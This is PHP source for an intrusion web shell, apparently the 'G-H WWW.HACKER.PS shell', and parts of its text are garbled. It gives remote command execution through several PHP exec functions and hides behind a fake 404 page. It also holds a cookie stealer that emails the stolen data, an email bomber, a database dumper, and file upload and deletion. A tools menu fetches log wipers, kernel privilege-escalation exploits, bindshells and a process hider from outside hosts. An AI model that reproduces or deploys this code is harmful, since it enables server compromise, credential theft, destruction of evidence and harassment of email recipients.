= cleandir($dir); } $contents = @$_POST['contents']; $gf = @$_POST['gf']; $img = @$_GET['img']; // Credits to disruptiv for this bit ;) if(count(get_included_files()) > 1 || count(get_included_files()) > 1) list($me) = explode("&", $_SERVER['REQUEST_URI']); else $me = $PHP_SELF . "?"; @session_start(); @set_time_limit(5); switch($auth){ // Authentication switcher case 1: if(md5($_SERVER['HTTP_USER_AGENT']) != $uakey) hide(); break; case 2: if(!in_array($_SERVER['REMOTE_ADDR'],$IP)) hide(); break; case 3: if(!$_SERVER['PHP_AUTH_USER']) userauth(); break; default: break; } function cleandir($d){ // Function to clean up the $dir and $curdir variables $d = realpath($d); $d = str_replace("\\", "\", $d); $d = str_replace("////", "//", $d); return($d); } function userauth(){ // Basic authentication function global $user, $pass; header("WWW-Authenticate: Basic realm='Secure Area'"); if(md5($_SERVER['PHP_AUTH_USER']) != $user || md5($_SERVER['PHP_AUTH_PW'] != $pass)) hide(); } function get_exec_function(){ // Command execution method finder $exec_functions = array("popen", "exec", "shell_exec", "system", "passthru"); $disabled_funcs = ini_get('disable_functions'); foreach($exec_functions as $f) if(strpos($disabled_funcs, $f) === false) return $f; } function execute_command($exec_function, $command){ // Command execution function switch($exec_function){ case "popen": $h = popen($command, "r"); while(!feof($h)) echo(fgets($h)); break; case "exec": exec($command, $result); foreach($result as $r) echo($r . "n"); break; case "shell_exec": echo(shell_exec($command)); break; case "system": system($command); break; case "passthru": passthru($command); break; } } if(!$act && !$cmd && !@$_GET['cookie'] && !@$_GET['f'] && !@$dir && !$gf && !$img && !@$_GET['ajxcmd']) main(); elseif(!$act && $cmd){ // Raw command execution style(); echo("Results:n
"); echo(""); } elseif(@$_GET['ajxcmd']){ // Command execution for AJAX shell if($_GET['ajxcmd'] == "home") $_SESSION['work_dir'] = getcwd(); elseif($exec_function = get_exec_function()){ if(strpos($_GET['ajxcmd'], 'cd') === 0){ $c = array_pop(explode(" ", $_GET['ajxcmd'])); if(@is_dir($_SESSION['work_dir'] . DIRECTORY_SEPARATOR . $c) && $c[0] != '\' && $c[0] != '//') $_SESSION['work_dir'] .= DIRECTORY_SEPARATOR . $c; elseif(@is_dir($c) && $c[0] != '.') $_SESSION['work_dir'] = $c; else echo("Invalid directoryn"); } else{ @chdir($_SESSION['work_dir']); execute_command($exec_function, $_GET['ajxcmd']); } } else die("All execution methods disabled."); } elseif(@$_GET['cookie']){@mail($email, "Cookie Data", @$_GET['cookie'], "From: $email"); hide();} // Cookie stealer function elseif($act == 'view' && @$_GET['f'] && $dir) view($_GET['f'], $dir); elseif($img) img($img); elseif($gf) grab($gf); elseif(@$dir) files($dir); else{ switch($act){ case 'phpinfo': phpinfo();break; case 'sql': sql();break; case 'files': files(@$dir);break; case 'email': email();break; case 'cmd': cmd();break; case 'upload': upload();break; case 'tools': tools();break; case 'sqllogin': sqllogin();break; case 'sql': sql();break; case 'lookup': lookup();break; case 'kill': kill();break; case 'phpexec': execphp();break; case 'bshell': bshell();break; default: main();break; } } function hide(){ // Hiding function global $self, $soft, $servip, $servport; header("HTTP/1.0 404 Not Found"); ?> 404 Not Found

Not Found

The requested URL was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


G-H WWW.HACKER.PS shell v.<?php echo($version . "-" . $servip); ?> 'Command Execute','files'=>'File View','phpinfo'=>'PHP info', 'phpexec'=>'PHP Execute', 'tools'=>'Tools','sqllogin'=>'SQL','upload'=>'Get Files','kill'=>'Kill Shell'); $capt = array_flip($act); echo("
n"); echo("Host: $servip
n"); echo("Server software: $soft
n"); echo("Uname: " . php_uname() . "
n"); echo("Shell Directory: " . getcwd() . "
n"); echo(" More Less

Links

" . $link . " ] "); ?>


:: G-H WWW.HACKER.PS shell v ::

Execute PHP Code"); echo(""); echo("n
n"); echo(""); echo("
"); if(@$_POST['phpexec']){ echo(""); } } function sqllogin(){ // MySQL login function global $me; if(@$_SESSION['isloggedin'] == "true") header("Location: " . $me . "&act=sql"); if(@$_POST['un'] && @$_POST['pw']) header("Location: " . $me . "&act=sql"); style(); ?>
User:

Password:

Host:

Port:

n"); die(sqllogin()); } else $_SESSION['isloggedin'] = "true"; } else die(sqllogin()); if (@$_GET['db']){ mysql_select_db($_GET['db'], $sqlcon); if(@$_GET['sqlquery']){ $dat = mysql_query($_GET['sqlquery'], $sqlcon) or die(mysql_error()); $num = mysql_num_rows($dat); for($i=0;$i<$num;$i++) echo(mysql_result($dat, $i) . "
n"); } else if(@$_GET['table'] && !@$_GET['sqlf']){ echo("Insert Row

n"); echo(""); $query = "SHOW COLUMNS FROM " . $_GET['table']; $result = mysql_query($query, $sqlcon) or die(mysql_error()); $i = 0; $fields = array(); while($row = mysql_fetch_assoc($result)){ array_push($fields, $row['Field']); echo(""); for($i=0;$i" . $row[0] . ""); } echo("n"); } } $y++; } echo("
" . $fields[$i]); $i++; } $result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error()); $num_rows = mysql_num_rows($result) or die(mysql_error()); $y=0; for($x=1;$x<=$num_rows+1;$x++){ if(!@$_GET['p']) $_GET['p'] = 1; if(@$_GET['p']){ if($y > (30*($_GET['p']-1)) && $y <= 30*($_GET['p'])){ echo("
n"); for($z=1;$z<=ceil($num_rows / 30);$z++){ echo("" . $z . " | "); } } elseif(@$_GET['table'] && @$_GET['sqlf']){ switch($_GET['sqlf']){ case "dl": sqldownload();break; case "ins": sqlinsert();break; default: $_GET['sqlf'] = ""; } } else{ echo(""); $query = "SHOW TABLES FROM " . $_GET['db']; $dat = mysql_query($query, $sqlcon) or die(mysql_error()); while ($row = mysql_fetch_row($dat)) echo("n"); echo("
" . $row[0] . "[Download]
"); } } else{ $dbs=mysql_list_dbs($sqlcon); while($row = mysql_fetch_object($dbs)) echo("" . $row->Database . "
n"); } mysql_close($sqlcon); } function sqldownload(){ // Download sql file function $sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']); mysql_select_db($_GET['db'], $sqlcon); $query = "SHOW COLUMNS FROM " . $_GET['table']; $result = mysql_query($query, $sqlcon) or die(mysql_error()); $fields = array(); while($row = mysql_fetch_assoc($result)){ array_push($fields, $row['Field']); $i++; } $result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error()); $num_rows = mysql_num_rows($result) or die(mysql_error()); for($x=1;$x<$num_rows;$x++){ $out .= "("; for($i=0;$inGo back"); } $query = "SHOW COLUMNS FROM " . @$_GET['table']; $result = mysql_query($query, $sqlcon) or die("MYSQL ERROR: " . mysql_error()); $i = 0; $fields = array(); echo("
"); echo(""); while($row = mysql_fetch_assoc($result)){ array_push($fields, $row['Field']); echo("
" . $fields[$i] . "
n"); $i++; } echo("
"); echo("
n"); echo("
"); } function nicesize($size){ if(!$size) return "0 B"; if ($size >= 1073741824) return(round($size / 1073741824) . " GB"); elseif ($size >= 1048576) return(round($size / 1048576) . " MB"); elseif ($size >= 1024) return(round($size / 1024) . " KB"); else return($size . " B"); } function files($dir){ // File manipulator function global $me, $self, $curdir; style(); if($dir=="") $dir = $curdir; $dirx = explode(DIRECTORY_SEPARATOR, $dir); $files = array(); $folders = array(); echo("
"); echo(""); echo(""); echo("
"); echo("

File list for "); for($i=0;$i$dirx[$i]" . DIRECTORY_SEPARATOR); } echo("

"); echo(""); echo(""); if ($handle = opendir($dir)) { while (false != ($link = readdir($handle))) { if (@is_dir($dir . DIRECTORY_SEPARATOR . $link)){ $file = array(); $color = @is_writable($dir . DIRECTORY_SEPARATOR . $link) ? "forestgreen" : (is_readable($dir . DIRECTORY_SEPARATOR . $link) ? "gold" : "red"); @$file['link'] = "$link"; @$file['icon'] = "folder"; $folder = " ". $file['link']; array_push($folders, $folder); } else{ $file = array(); $ext = strpos($link, ".") ? strtolower(end(explode(".", $link))) : ""; $file['size'] = nicesize(@filesize($dir . DIRECTORY_SEPARATOR . $link)); $color = @is_writable($dir . DIRECTORY_SEPARATOR . $link) ? "forestgreen" : (is_readable($dir . DIRECTORY_SEPARATOR . $link) ? "gold" : "red"); @$file['link'] = "$link"; switch($ext){ case 'exe': case 'com': case 'jar': case '': $file['icon']='binary'; break; case 'jpg': case 'gif': case 'png': case 'bmp': $file['icon']='image'; break; case 'zip': case 'tar': case 'rar': case 'gz': case 'cab': case 'bz2': case 'gzip': $file['icon']='compressed'; break; case 'txt': case 'doc': case 'pdf': case 'htm': case 'html': case 'rtf': $file['icon']='text'; break; case 'wav': case 'mp3': case 'mp4': case 'wma': $file['icon']='sound'; break; case 'js': case 'vbs': case 'c': case 'h': case 'sh': case 'pl': case 'py': case 'php': case 'h': $file['icon']='script'; break; default: $file['icon'] = 'unknown'; break; } $file = "n"; array_push($files, $file); } } foreach($folders as $folder) echo("n"); foreach($files as $file) echo($file); echo("
File NameFile Size
 ". $file['link'] . "" . $file['size'] . "
$folderDIR
"); closedir($handle); } } function email(){ // Email bomber function global $me; style(); ?>
Your address:

Their address:

Subject:

Text:

How many times:



"); echo("Go back"); die(); } elseif(@$_POST['fileact'] == "Delete"){ unlink($filename); echo("Deleted file.

"); echo("Go back"); die(); } if($dir != "nullz") $filename = $dir . DIRECTORY_SEPARATOR . $filename; // heh $file = @fopen($filename, 'r'); $content = @fread($file, @filesize($filename)); echo("
"); echo("
Output Directory


Remote Upload


Local File Upload

"1", "Vanish2.tgz"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/vanish2.tgz", "Cloak.c"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/cloak.c", "gh0st.sh"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/gh0st.sh", "--- Priv Escalation ---"=>"2", "h00lyshit - Linux 2.6 ALL"=>"http://someshit.net/files/xpl/h00lyshit", "k-rad3 - Linux <= 2.6.11"=>"http://someshit.net/files/xpl/krad3", "raptor - Linux <= 2.6.17.4"=>"http://someshit.net/files/xpl/raptor", "rootbsd - BSD v?"=>"http://someshit.net/files/xpl/rootbsd", "--- Bindshells ---"=>"3", "THC rwwwshell-1.6.perl"=>"http://packetstormsecurity.org/groups/thc/rwwwshell-1.6.perl", "Basic Perl bindshell"=>"http://packetstormsecurity.org/groups/synnergy/bindshell-unix", "--- Misc ---"=>"4", "MOCKS SOCKS4 Proxy"=>"http://superb-east.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz", "xps.c (proc hider)"=>"http://packetstormsecurity.org/groups/shadowpenguin/unix-tools/xps.c"); $names = array_flip($tools); echo("
"); echo("Output Directory
"); echo("

"); echo(""); echo("
"); echo("
"); echo("
"); echo("Bindshell (requires writable directory)
n"); echo("List domains (requires writable directory)
n"); echo("E-mail bomber
n"); } function lookup(){ // Domain lookup function global $servinf; style(); $script = "import urllib, urllib2, sys, re req = urllib2.Request('http://www.seologs.com/ip-domains.html', urllib.urlencode({'domainname' : sys.argv[1]})) site = re.findall('.+) (.+)
', urllib2.urlopen(req).read()) for i in xrange(0,len(site)): print site[i]"; // My sexy python script $handle = fopen('lookup.py', 'w'); @fwrite($handle, $script); @fclose($handle); echo("

Domains

"); echo("
    "); $cmd = exec("python lookup.py $servinf[0]", $ret); foreach($ret as $site) echo("
  • $siten"); echo("
"); @unlink('lookup.py'); } function bshell(){ // Python bindshell script style(); if(!@$_POST['bport']){ ?>
Port:
"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAA" . "gALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwq" . "d1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", "image"=>"R0lGODlhFAAWAOMAAP////8zM8z//8zMzJmZmWZmZmYAADMzMwCZzACZMwAzZgAAAAAAAAAAAAAAAAAAACH+TlRoaX" . "MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" . "ZXIgMTk5NQAh+QQBAAACACwAAAAAFAAWAAAEkPDISae4WBzAu99Hdm1eSYYZWXYqOgJBLAcDoNrYNssGsBy/4GsX6y" . "2OyMWQ2OMQngSlBjZLWBM1AFSqkyU4A2tWywUMYt/wlTSIvgYGA/Zq3QwU7mmHvh4g8GUsfAUHCH95NwMHV4SGh4Ed" . "ihOOjy8rZpSVeiV+mYCWHncKo6Sfm5cliAdQrK1PQBlJsrNSEQA7", "unknown"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" . "AAADaDi6vPEwDECrnSO+aTvPEQcIAmGaIrhR5XmKgMq1LkoMN7ECrjDWp52r0iPpJJ0KjUAq7SxLE+sI+9V8vycFiM" . "0iLb2O80s8JcfVJJTaGYrZYPNby5Ov6WolPD+XDJqAgSQ4EUCGQQEJADs=", "binary"=>"R0lGODlhFAAWAMIAAP///8z//8zMzJmZmTMzMwAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" . "AAADaUi6vPEwEECrnSS+WQoQXSEAE6lxXgeopQmha+q1rhTfakHo/HaDnVFo6LMYKYPkoOADim4VJdOWkx2XvirUgq" . "VaVcbuxCn0hKe04znrIV/ROOvaG3+z63OYO6/uiwlKgYJJOxFDh4hTCQA7", "text"=>"R0lGODlhFAAWAOMAAP/////MM/8zM8z//5mZmZlmM2bM/zMzMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH+TlRoaX" . "MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" . "ZXIgMTk5NQAh+QQBAAADACwAAAAAFAAWAAAEb/DISee4eBzAu99Hdm1eSYbZWXEkgI5sEBg0+2HnTBsccvhAmGtXAy" . "COSITwUGg2PYQoQalhOZ/QKLVV6gKmQm8XXDUmzx0yV5ze9s7JdpgtL3ME5jhHTS/xO3hwdWt0f317WwdSi4xRPxlw" . "kUgXEQA7", "compressed"=>"R0lGODlhFAAWAOcAAP//////zP//mf//Zv//M///AP/M///MzP/Mmf/MZv/MM//MAP+Z//+ZzP+Zmf+ZZv+ZM/+ZAP" . "9m//9mzP9mmf9mZv9mM/9mAP8z//8zzP8zmf8zZv8zM/8zAP8A//8AzP8Amf8AZv8AM/8AAMz//8z/zMz/mcz/Zsz/" . "M8z/AMzM/8zMzMzMmczMZszMM8zMAMyZ/8yZzMyZmcyZZsyZM8yZAMxm/8xmzMxmmcxmZsxmM8xmAMwz/8wzzMwzmc" . "wzZswzM8wzAMwA/8wAzMwAmcwAZswAM8wAAJn//5n/zJn/mZn/Zpn/M5n/AJnM/5nMzJnMmZnMZpnMM5nMAJmZ/5mZ" . "zJmZmZmZZpmZM5mZAJlm/5lmzJlmmZlmZplmM5lmAJkz/5kzzJkzmZkzZpkzM5kzAJkA/5kAzJkAmZkAZpkAM5kAAG" . "b//2b/zGb/mWb/Zmb/M2b/AGbM/2bMzGbMmWbMZmbMM2bMAGaZ/2aZzGaZmWaZZmaZM2aZAGZm/2ZmzGZmmWZmZmZm" . "M2ZmAGYz/2YzzGYzmWYzZmYzM2YzAGYA/2YAzGYAmWYAZmYAM2YAADP//zP/zDP/mTP/ZjP/MzP/ADPM/zPMzDPMmT" . "PMZjPMMzPMADOZ/zOZzDOZmTOZZjOZMzOZADNm/zNmzDNmmTNmZjNmMzNmADMz/zMzzDMzmTMzZjMzMzMzADMA/zMA" . "zDMAmTMAZjMAMzMAAAD//wD/zAD/mQD/ZgD/MwD/AADM/wDMzADMmQDMZgDMMwDMAACZ/wCZzACZmQCZZgCZMwCZAA" . "Bm/wBmzABmmQBmZgBmMwBmAAAz/wAzzAAzmQAzZgAzMwAzAAAA/wAAzAAAmQAAZgAAM+4AAN0AALsAAKoAAIgAAHcA" . "AFUAAEQAACIAABEAAADuAADdAAC7AACqAACIAAB3AABVAABEAAAiAAARAAAA7gAA3QAAuwAAqgAAiAAAdwAAVQAARA" . "AAIgAAEe7u7t3d3bu7u6qqqoiIiHd3d1VVVURERCIiIhEREQAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMg" . "ZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAAkACwAAAAAFA" . "AWAAAImQBJCCTBqmDBgQgTDmQFAABDVgojEmzI0KHEhBUrWrwoMGNDihwnAvjHiqRJjhX/qVz5D+VHAFZiWmmZ8BGH" . "ji9hxqTJ4ZFAmzc1vpxJgkPPn0Y5CP04M6lPEkCN5mxoJelRqFY5TM36NGrPqV67Op0KM6rYnkup/gMq1mdamC1tdn" . "36lijUpwjr0pSoFyUrmTJLhiTBkqXCgAA7", "sound"=>"R0lGODlhFAAWAMIAAP////8zM8z//8zMzJmZmWYAADMzMwAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAACACwAAAAAFAAW" . "AAADayi63P4wNsNCkOocYVWPB7FxFwmFwGh+DZpynndpNAHcW9cVQUj8tttrd+G5hMINT7A0BpE4ZnF6hCqn0iryKs" . "0SDN9v0tSc0Q4DQ1SHFRjeBrQ6FzNN5Co2JD4YfUp7GnYsexQLhBiJigsJADs=", "script"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" . "AAADZTi6vPEwDECrnSO+aTvPEddVIrhVBJCSF8QRMIwOBE2fVLrmcYz3O4pgKCDgVMgR0SgZOYVM0dNS/AF7gGy1me" . "16v9vXNdYNf89es2os00bRcDW7DVDDwe87fjMg+v9DNxBzYw8JADs="); header("Content-type: image/gif"); echo(base64_decode($images[$img])); die(); } function kill(){ // Shell deleter function style(); echo("
"); echo("Type 'confirm' to kill the shell:
n"); echo(""); echo("
"); if(@$_POST['ver'] == "confirm"){ $self = basename($_SERVER['PHP_SELF']); if(unlink($self)) echo("Deleted"); else echo("Failed"); } } die(); ?>